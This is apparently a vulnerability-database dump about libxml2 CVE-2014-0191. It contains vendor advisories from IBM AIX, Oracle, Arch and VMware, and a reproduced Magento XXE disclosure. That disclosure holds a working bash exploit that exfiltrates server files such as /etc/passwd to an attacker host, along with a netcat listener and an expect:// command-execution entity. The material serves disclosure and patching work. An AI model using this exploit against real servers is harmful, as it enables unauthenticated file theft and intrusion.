6.1.9.15(2.2.3.3)\n\nIV. SOLUTIONS\n\n A. APARS\n\n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR number Availability KEY\n ------------------------------------------------------------\n| 6.1.8 IV62447 12/31/2014 SP6 key_w_apar\n 6.1.9 IV62448 10/24/2014 SP4 key_w_apar\n| 7.1.2 IV62449 12/31/2014 SP6 key_w_apar\n 7.1.3 IV62450 10/24/2014 SP4 key_w_apar\n \n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV62447\n http://www.ibm.com/support/docview.wss?uid=isg1IV62448\n http://www.ibm.com/support/docview.wss?uid=isg1IV62449\n http://www.ibm.com/support/docview.wss?uid=isg1IV62450\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. 
The fixes can be downloaded via ftp\n from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/libxml2_fix.tar\n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n AIX Level Interim Fix (*.Z) KEY\n ---------------------------------------------------\n 6.1.8.4 IV62447s4a.140715.epkg.Z key_w_fix\n 6.1.9.3 IV62448s3a.140715.epkg.Z key_w_fix\n 7.1.2.4 IV62449s4a.140715.epkg.Z key_w_fix\n 7.1.3.3 IV62450s3a.140715.epkg.Z key_w_fix\n\n VIOS Level Interim Fix (*.Z)\n -------------------------------------\n 2.2.2.4 IV62447s4a.140715.epkg.Z\n 2.2.3.3 IV62448s3a.140715.epkg.Z\n\n To extract the fixes from the tar file:\n\n tar xvf libxml2_fix.tar\n cd libxml2_fix\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command is the following:\n\n openssl dgst -sha256 filename KEY\n ----------------------------------------------------------------------------------------------------\n c3b02f8faf29386056616d4ec015acc47d5b8849e84a6f10912db62082fd8a23 IV62447s4a.140715.epkg.Z key_w_csum\n d0beae655b28178f13952fb0da831e028a28b9ed25d3cfe267e61cbcf08ff5aa IV62448s3a.140715.epkg.Z key_w_csum\n 2ce78311783f31c76abc8fba4d8f4ebeb376c64e23c268f954b0b9356d431755 IV62449s4a.140715.epkg.Z key_w_csum\n 3b414db115af1f4d32879474d14d8aaed276f149db6bc022e398f2c58a6da0a2 IV62450s3a.140715.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. 
If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n\n http://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc.sig\n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; thus, IBM does not warrant the fully\n correct functionality of an interim fix.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\nV. WORKAROUNDS\n\n None\n\nVI. 
OBTAINING FIXES\n\n AIX security fixes can be downloaded from:\n\n ftp://aix.software.ibm.com/aix/efixes/security\n\n AIX fixes can be downloaded from:\n\n http://www.ibm.com/eserver/support/fixes/fixcentral/main/pseries/aix\n\n NOTE: Affected customers are urged to upgrade to the latest\n applicable Technology Level and Service Pack.\n\nVII. CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n \n To view previously issued advisories, please visit:\n \n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n\n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n\tTo obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To request the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\nVIII. ACKNOWLEDGMENTS\n\n IBM discovered and fixed this vulnerability as part of its\n commitment to secure the AIX operating system.\n\nIX. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/75510\n CVE-2014-0191: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0191\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. 
Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n", "edition": 16, "modified": "2014-08-22T08:17:41", "published": "2014-08-15T10:26:30", "id": "LIBXML2_ADVISORY.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc", "title": "AIX libxml2 vulnerability,VIOS libxml2 vulnerability", "type": "aix", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:27", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "[2.9.1-5.0.1.el7_1.2]\n- Update doc/redhat.gif in tarball\n- Add libxml2-oracle-enterprise.patch and update logos in tarball\n[2.9.1-5.2]\n- Fix missing entities after CVE-2014-3660 fix\n- CVE-2014-0191 Do not fetch external parameter entities (rhbz#1195649)\n- Fix regressions introduced by CVE-2014-0191 patch", "edition": 4, "modified": "2015-03-30T00:00:00", "published": "2015-03-30T00:00:00", "id": "ELSA-2015-0749", "href": "http://linux.oracle.com/errata/ELSA-2015-0749.html", "title": "libxml2 security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:06", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2013-2877"], "description": "[2.7.6-14.0.1.el6_5.1]\n- Update doc/redhat.gif in tarball\n- Add libxml2-oracle-enterprise.patch 
and update logos in tarball\n[2-2.7.6-14.el6_5.1]\n- Improve handling of xmlStopParser(CVE-2013-2877)\n- Do not fetch external parameter entities (CVE-2014-0191)", "edition": 4, "modified": "2014-05-19T00:00:00", "published": "2014-05-19T00:00:00", "id": "ELSA-2014-0513", "href": "http://linux.oracle.com/errata/ELSA-2014-0513.html", "title": "libxml2 security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:34:08", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7497", "CVE-2015-7941", "CVE-2014-0191", "CVE-2015-8317", "CVE-2015-7498", "CVE-2015-8241", "CVE-2015-5312", "CVE-2015-7500", "CVE-2015-8242", "CVE-2015-1819", "CVE-2015-7499", "CVE-2014-3660", "CVE-2015-7942"], "description": "[2.9.1-6.0.1.el7_1.2]\n- Update doc/redhat.gif in tarball\n- Add libxml2-oracle-enterprise.patch and update logos in tarball\n[2.9.1-6.2]\n- Fix a series of CVEs (rhbz#1286496)\n- CVE-2015-7941 Stop parsing on entities boundaries errors\n- CVE-2015-7941 Cleanup conditional section error handling\n- CVE-2015-8317 Fail parsing early on if encoding conversion failed\n- CVE-2015-7942 Another variation of overflow in Conditional sections\n- CVE-2015-7942 Fix an error in previous Conditional section patch\n- Fix parsing short unclosed comment uninitialized access\n- CVE-2015-7498 Avoid processing entities after encoding conversion failures\n- CVE-2015-7497 Avoid an heap buffer overflow in xmlDictComputeFastQKey\n- CVE-2015-5312 Another entity expansion issue\n- CVE-2015-7499 Add xmlHaltParser() to stop the parser\n- CVE-2015-7499 Detect incoherency on GROW\n- CVE-2015-7500 Fix memory access error due to incorrect entities boundaries\n- CVE-2015-8242 Buffer overead with HTML parser in push mode\n- CVE-2015-1819 Enforce the reader to run in constant memory\n[2.9.1-6]\n- Fix missing entities after CVE-2014-3660 fix\n- CVE-2014-0191 Do not fetch external parameter entities (rhbz#1195650)\n- Fix regressions introduced 
by CVE-2014-0191 patch\n[2.9.1-5.1]\n- CVE-2014-3660 denial of service via recursive entity expansion (rhbz#1149087)", "edition": 4, "modified": "2015-12-07T00:00:00", "published": "2015-12-07T00:00:00", "id": "ELSA-2015-2550", "href": "http://linux.oracle.com/errata/ELSA-2015-2550.html", "title": "libxml2 security update", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:49", "description": "\neBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection", "edition": 1, "published": "2015-10-30T00:00:00", "title": "eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0191", "CVE-2015-5161"], "modified": "2015-10-30T00:00:00", "id": "EXPLOITPACK:C06A4B2B66645C13B898B81F53653130", "href": "", "sourceData": "=============================================\n- Release date: 29.10.2015\n- Discovered by: Dawid Golunski\n- Severity: High/Critical\n- eBay Magento ref.: APPSEC-1045\n=============================================\n\n \nI. VULNERABILITY\n-------------------------\n\neBay Magento CE <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP FPM\neBay Magento EE <= 1.14.2.1 \n\n \nII. BACKGROUND\n-------------------------\n\n- eBay Magento eCommerce\n\nhttp://magento.com/\n\n\"More than 240,000 merchants worldwide put their trust in our eCommerce \nsoftware. Magento's eCommerce platform gives you the tools you need to attract \nmore prospects, sell more products, and make more money. It's what we do.\n\nWe're owned by eBay, so you know we're eCommerce experts\"\n\n\n- PHP FPM\n\nhttp://php.net/manual/en/install.fpm.php\n\n\"FPM (FastCGI Process Manager) is an alternative PHP FastCGI implementation with\n some additional features (mostly) useful for heavy-loaded sites.\"\n\nStarting from release 5.3.3 in early 2010, PHP merged the php-fpm fastCGI \nprocess manager into its codebase. \n\n \nIII. 
INTRODUCTION\n-------------------------\n\neBay Magento eCommerce application uses Zend Framework which has a \nvulnerability that allows for XML eXternal Entity injection in applications\nserved with PHP FPM.\n\nXXE (XML eXternal Entity) attack is an attack on an application that parses XML \ninput from untrusted sources using incorrectly configured XML parser. \nThe application may be forced to open arbitrary files and/or network resources.\nExploiting XXE issues on PHP applications may also lead to denial of service or\nin some cases (e.g. when an 'expect' PHP module is installed) lead to command \nexecution.\n\n\nIV. DESCRIPTION\n-------------------------\n \nThe aforementioned XXE vulnerability in Zend Framework which affects eBay \nMagento, was assigned a CVE-ID of CVE-2015-5161 and can be found in a \nseparate advisory at:\n\nhttp://legalhackers.com/advisories/zend-framework-XXE-vuln.txt\n\nIn short, the Zend Framework XXE vulnerability stems from an insufficient \nsanitisation of untrusted XML data on systems that use PHP-FPM to serve PHP \napplications. \nBy using certain multibyte encodings within XML, it is possible to bypass \nthe sanitisation and perform certain XXE attacks.\n\nSince eBay Magento is based on Zend Framework and uses several of its XML\nclasses, it also inherits this XXE vulnerability.\n\nThe vulnerability in Zend affects all its XML components, however there \nare two vulnerable Zend Framework vulnerable components:\n\n - Zend_XmlRpc_Server \n - Zend_SOAP_Server \n\nthat are of special interest to attackers as they could be exploited remotely \nwithout any authentication. \n\nMagento implements a store API providing XML/SOAP web services. 
\nAlthough the Zend_XmlRpc is present within Magento code base, the testing \nrevealed that an older Zend class was used for its implementation, which is\nnot vulnerable.\n\nHowever, further testing revealed that Magento SOAP API was implemented using\nthe Zend_SOAP_Server class from Zend Framework, which is vulnerable to the \nXXE injection vulnerability discovered earlier.\n\n \nV. PROOF OF CONCEPT\n-------------------------\n \nNormally, when an XML containing entities is supplied to magento SOAP API, the\nfollowing message gets produced:\n\n<SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Sender</faultcode>\n<faultstring>Detected use of ENTITY in XML, disabled to prevent XXE/XEE \nattacks</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope> \n\nBelow is a POC exploit that automates the steps necessary to bypass this\nprotection on Magento served with PHP-FPM, and remotely exploit the XXE issue \nin Magento's SOAP API without authentication.\nAuthentication is not required for the exploitation, as Magento first needs to\nload the malicious XML data in order to read credentials within the SOAP \nlogin method. Loading malicious XML may be enough to trigger attacker's payload\nwithin the entities (in case of libxml2 library auto-expanding entities).\n\n\n---[ magento-soap-exploit.sh ]---\n\n#!/bin/bash\n#\n# POC Exploit (v1.1)\n#\n# eBay Magento CE <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP-FPM\n# eBay Magento EE <= 1.14.2.1\n#\n# CVE-2015-5161\n#\n# Credits:\n#\n# Dawid Golunski\n# dawid (at) legalhackers.com\n# http://legalhackers.com\n#\n# Advisories:\n#\n# http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt\n# http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt\n#\n# Usage:\n#\n# [Vulnerability test]\n#\n# This is to test the vulnerability with a simple XXE payload which retrieves the\n# /dev/random file and causes a time out. 
No receiver server is required in this\n# test as no data is returned.\n#\n# Run the script with just the URL to Magento SOAP API, with no other parameters. \n# E.g:\n# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index\n#\n#\n# [File retrieval from the remote server]\n# \n# ./magento-soap-exploit.sh MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT\n#\n# E.g:\n# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index /etc/hosts 192.168.10.5 80\n#\n# In this example, file extracted via the XXE attack will be sent as base64 encoded parameter to:\n# http://192.168.10.5:80/fetch.php?D=[base64_string]\n# You should have the receiver server/script listening on the specified port before running this exploit.\n#\n\nTIMEOUT=6\nPAYLOAD_TMP_FILE=\"/tmp/payload-utf16.xml\"\n\nif [ $# -ne 1 ] && [ $# -ne 4 ] ; then \n\techo -e \"\\nUsage: \\n\"\n\techo -e \"[Vulnerability test]\\n\"\n\techo -e \"$0 MAGENTO_SOAP_API_URL\"\n\techo -e \"E.g:\"\n\techo -e \"$0 http://fpmserver/magento/index.php/api/soap/index\\n\";\n\techo -e \"[File retrieval]\\n\"\n\techo -e \"$0 MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT\"\n\techo -e \"E.g:\"\n\techo -e \"$0 http://fpmserver/magento/index.php/api/soap/index /etc/hosts 192.168.5.6 80\\n\";\n\texit 2;\nelse \n\tTARGETURL=\"$1\"\nfi\nif [ $# -eq 4 ]; then \n\tFILE=\"$2\"\t\n\tRECEIVER_HOST=\"$3\"\n\tRECEIVER_PORT=\"$4\"\n\tTEST_ONLY=0\nelse\n\tTEST_ONLY=1\nfi \n\nif [ $TEST_ONLY -eq 1 ]; then \n\t# Vulnerability test \n\t# Perform only a test by reading /dev/random file\n\tTEST_PAYLOAD_XML='<?xml version=\"1.0\" encoding=\"UTF-16\"?>\n\t<!DOCTYPE foo [ \n\t<!ELEMENT PoC ANY >\n\t<!ENTITY % xxe SYSTEM \"file:///dev/random\" >\n\t\t%xxe;\n\t]>'\n\n\techo \"$TEST_PAYLOAD_XML\" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE\n\techo -e \"Target URL: $TARGETURL\\nInjecting Test XXE payload (/dev/random). 
Might take a few seconds.\\n\"\n\n\t# Fetching /dev/random should cause the remote script to block\n\t# on reading /dev/random until the script times out.\n\t# If there is no delay it means the remote script is not vulnerable or \n\t# /dev/random is not accessible.\n\tSTART=$(date +%s)\n\twget -t 1 -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE\n\tEND=$(date +%s)\n\tDIFF=$(expr $END \\- $START )\n\n\tif [ $DIFF -eq $TIMEOUT ]; then\n\t\techo \"Vulnerable. No response from Magento for $DIFF seconds :)\"\n\t\texit 0\n\telse \n\t\techo \"Not vulnerable, or there is no /dev/random on the remote server ;)\"\n\t\texit 1\n\tfi\nelse \n\t# File retrieval XXE payload\n\tSEND_DTD=\"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\n\t<!ENTITY % all \\\"<!ENTITY % send SYSTEM 'php://filter/read=/resource=http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php?D=%file;'>\\\">\n\t%all;\"\n\tSEND_DTD_B64=\"`echo \"$SEND_DTD\" | base64 -w0`\"\n\tFILE_PAYLOAD_XML=\"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-16\\\"?>\n\t<!DOCTYPE foo [ \n\t<!ENTITY % file SYSTEM \\\"php://filter/convert.base64-encode/resource=$FILE\\\">\n\t<!ENTITY % dtd SYSTEM \\\"data://text/plain;base64,$SEND_DTD_B64\\\">\n\t%dtd;\n\n\t%send;\n\t]>\"\n\n\t# Retrieve $FILE from the remote server and send it to $RECEIVER_HOST:$RECEIVER_PORT\n\techo \"$FILE_PAYLOAD_XML\" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE\n\techo -e \"Target URL: $TARGETURL\\n\\nInjecting XXE payload to retrieve the $FILE file...\"\n\techo -e \"If successful, Base64 encoded result will be sent to http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php/D=[base64_result]\\n\"\n\techo -e \"If in doubt, try the vulnerability test option.\\n\"\n\twget -t 1 -v -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE\nfi\n\n\n--------------------------------\n\nThe above exploit uses the Out of band XXE payload which sends\nany retrieved data back to the attacker even though the attacker cannot\nsee the resulting file in the 
server's response directly. \nThis exploit also bypasses the LIBXML_NONET libxml setting imposed by the Zend \nFramework which prohibits network access. This is achieved through the usage of\nphp://filter wrapper which is treated as a local resource by the XML ENTITY \nhandler even though it references remote resources. \n\nSuccessful exploitation in a test mode ('Vulnerability test', exploit run \nwithout parameters other than the URL to Magento SOAP API) will result in a \ntime out and an internal server error caused by the XML ENTITY accessing \n/dev/random file which will block the API script. \n\nFor example:\n\n---\n\n$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index\nTarget URL: http://vulnhost/magento/index.php/api/soap/index\nInjecting Test XXE payload (/dev/random). Might take a few seconds.\n\n--2015-05-19 22:14:17-- http://vulnhost/magento/index.php/api/soap/index\nResolving precise (vulnhost)... 127.0.0.1\nConnecting to vulnhost (vulnhost)|127.0.0.1|:80... connected.\nHTTP request sent, awaiting response... Read error (Connection timed out) in \nheaders. Giving up.\n\nVulnerable. No response from Magento for 6 seconds :)\n\n---\n\n\nArbitrary file accessible to the PHP process can also be fetched with the \nabove exploit by using the following syntax:\n\n---\n\nattacker$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index /etc/passwd attackershost 9090\n\nTarget URL: http://vulnhost/magento/index.php/api/soap/index\nInjecting XXE payload to retrieve the /etc/passwd file... \n\nIf successful, Base64 encoded result will be sent to http://attackershost:9090/fetch.php/D=[base64_result]\nIf in doubt, try the vulnerability test option.\n\n--2015-05-19 22:33:06-- http://vulnhost/magento/index.php/api/soap/index\nResolving vulnhost (vulnhost)... 192.168.57.12\nConnecting to vulnhost (vulnhost)|192.168.57.12|:80... connected.\nHTTP request sent, awaiting response... 
Read error (Connection timed out) in \nheaders. Giving up.\n\n---\n\nThe result will be sent to attacker's server listening on port 9090 which\nneeds to be set up before running the exploit:\n\n---\n\nattacker# nc -vv -l 9090\n\nListening on [0.0.0.0] (family 0, port 9090)\nConnection from [192.168.57.12] port 9090 [tcp/*] accepted (family 2, sport 47227)\nGET /fetch.php?D=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY[...cut...] HTTP/1.0\nHost: attackershost:9090\n\n\nattacker# echo 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY' | base64 -d\n\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh\n[...]\n\n---\n\n\nIt may also be possible to execute arbitrary commands on the remote server\nif the remote PHP installation has the 'expect' module enabled.\nIn such case, an attacker could use expect:// wrapper within XML ENTITY\nto execute any command in the context of the PHP process.\nFor example, by adding the XML entity of:\n\n<ENTITY % file SYSTEM \"expect://id\">\n\nthe attacker could execute the /usr/bin/id command on the remote Magento host.\n\n\nVI. BUSINESS IMPACT\n-------------------------\n\nThis issue should be marked as high/critical due to the wide deployment of \neBay Magento software, low complexity of exploitation, as well as a possibility\nof an unauthenticated remote exploitation as demonstrated in this advisory. 
\nIf successful, an attacker could access sensitive files available to the\nweb server process, cause Denial Of Service, or even execute arbitrary commands\non the server with the permissions of the PHP/web process if certain PHP \nmodules are installed.\n\nThere is also a growing number of servers set up to serve PHP code with \nPHP-FPM, especially in web hosting environments which need to respond to heavy\nload.\nThere are official Magento tutorials explaining how to set up Magento with Nginx\nand PHP FPM for best performance:\n\nhttp://info.magento.com/rs/magentocommerce/images/\nMagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf\n \nVII. SYSTEMS AFFECTED\n-------------------------\n\nVersions of eBay Magento CE equal to 1.9.2.1, or older can be exploited on a\nweb server with PHP-FPM SAPI.\neBay Magento EE was not tested, but is also affected by this issue according\nto the vendor (see APPSEC-1045), up to version EE 1.14.2.1.\n\nTo be exploitable, the system must have a version of libxml library which \nexpands XML entities without additional libxml2 settings. This is true for \nolder versions, as well as newer versions of libxml2 with missing updates,\nsuch as a fairly recent patch for the issue of CVE-2014-0191. \nFor some distributions (see references below) libxml2 patches were released \nas late as April 2015, and for this reason, there are likely many systems \nwhich still lack the libxml2 updates and allow exploitation of the Magento/Zend \nvulnerability described in this advisory.\n\nThe exploit however does not depend on a PHP version installed. 
In fact, the\nexploit was confirmed to work on Fedora 21 with a new (a month's old) PHP \nversion of:\n\nPHP Version => 5.6.14\nBuild Date => Sep 30 2015 13:53:16\n\nThe issue can also be exploited on multiple web servers, as PHP-FPM can be set\nup on popular web servers such as Apache, or Nginx on Linux/Unix, as well as \nWindows systems (as per the 'fpm on cygwin' setup guides available on the \nInternet).\n\n \nVIII. SOLUTION\n-------------------------\n\neBay Magento was informed about the issue and assigned it a reference ID of\nAPPSEC-1045. eBay released a patch bundle titled:\n\n'SUPEE-6788 Patch Bundle'\n\nprior to the release of this advisory. \nTo address the vulnerability, the patch should be installed, or Magento should \nbe upgraded to the latest version of 1.9.2.2 which already contains the fix.\n \nIX. REFERENCES\n-------------------------\n\nhttp://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt\n\nhttp://legalhackers.com/advisories/zend-framework-XXE-vuln.txt\n\nhttp://framework.zend.com/security/advisory/ZF2015-06\n\nPowering Magento with Ngnix and PHP-FPM:\nhttp://info.magento.com/rs/magentocommerce/images/MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf\n\nhttp://www.securiteam.com/\n\nhttp://seclists.org/fulldisclosure/2015/Oct/105\n\nOfficial eBay Magento website:\nhttp://magento.com/\n\nPatch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML \nFunctionality Using Multibyte Payloads' (APPSEC-1045) is available at:\n\nhttp://merch.docs.magento.com/ce/user_guide/magento/patch-releases-2015.html\n\nCVE-2014-0191 :\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0191\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1090976\n\n\nX. DISCOVERED BY\n-------------------------\n\nThe vulnerability has been discovered by Dawid Golunski\ndawid (at) legalhackers (dot) com\nlegalhackers.com\n \nXI. 
REVISION HISTORY\n-------------------------\n\nOct 29th, 2015: Advisory released\n\nNov 3rd, 2015: Updated exploit to work on newer libxml2 versions such as \n 2.9.1 without CVE-2014-0191 patch, updated 'Systems affected' \n section, plus minor updates in other sections\n \nXII. LEGAL NOTICES\n-------------------------\n\nThe information contained within this advisory is supplied \"as-is\" with\nno warranties or guarantees of fitness of use or otherwise. I accept no\nresponsibility for any damage caused by the use or misuse of this information.", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "Daniel Berrange discovered that libxml2 incorrectly performs entity\nsubstitution in the doctype prolog, even if the application using\nlibxml2 disabled any entity substitution. A remote attacker could\nprovide a specially crafted XML file that, when processed, leads to the\nexhaustion of CPU and memory resources or file descriptors.", "modified": "2014-10-24T00:00:00", "published": "2014-10-24T00:00:00", "id": "ASA-201410-12", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-October/000123.html", "type": "archlinux", "title": "libxml2: Denial of service", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "vmware": [{"lastseen": "2019-11-06T16:05:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3797", "CVE-2014-0191", "CVE-2013-4238", "CVE-2013-2877", "CVE-2014-0015", "CVE-2013-1752", "CVE-2014-8371", "CVE-2014-0138"], "description": "**a. VMware vCSA cross-site scripting vulnerability** \nVMware vCenter Server Appliance (vCSA) contains a vulnerability that may allow for Cross Site Scripting. Exploitation of this vulnerability in vCenter Server requires tricking a user to click on a malicious link or to open a malicious web page. 
\nVMware would like to thank Tanya Secker of Trustwave SpiderLabs for reporting this issue to us. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2014-3797 to this issue. \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "edition": 4, "modified": "2015-01-27T00:00:00", "published": "2014-12-04T00:00:00", "id": "VMSA-2014-0012", "href": "https://www.vmware.com/security/advisories/VMSA-2014-0012.html", "title": "VMware vSphere product updates address security vulnerabilities", "type": "vmware", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "apple": [{"lastseen": "2020-12-24T20:44:16", "bulletinFamily": "software", "cvelist": ["CVE-2015-3733", "CVE-2015-3776", "CVE-2015-3736", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3744", "CVE-2015-3734", "CVE-2015-3731", "CVE-2015-3778", "CVE-2015-3752", "CVE-2015-3732", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3798", "CVE-2015-3738", "CVE-2015-5777", "CVE-2015-3740", "CVE-2015-3782", "CVE-2015-3739", "CVE-2015-3784", "CVE-2015-3743", "CVE-2015-3768", "CVE-2015-3747", "CVE-2015-5781", "CVE-2015-5749", "CVE-2015-3805", "CVE-2015-5774", "CVE-2015-3730", "CVE-2015-3803", "CVE-2015-3750", "CVE-2015-3795", "CVE-2015-5761", "CVE-2015-3753", "CVE-2015-5773", "CVE-2015-3800", "CVE-2015-3807", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-3749", "CVE-2015-3742", "CVE-2012-6685", "CVE-2015-3748", "CVE-2015-5775", "CVE-2015-3759", "CVE-2015-3746", "CVE-2015-3793", "CVE-2015-5755", "CVE-2015-5758", "CVE-2015-3804", "CVE-2015-3741", "CVE-2015-3751", "CVE-2015-5782", "CVE-2015-5778", "CVE-2015-3745", "CVE-2015-3735", "CVE-2015-7995", "CVE-2015-5757", "CVE-2015-3796", "CVE-2015-3806", "CVE-2015-3737"], "description": 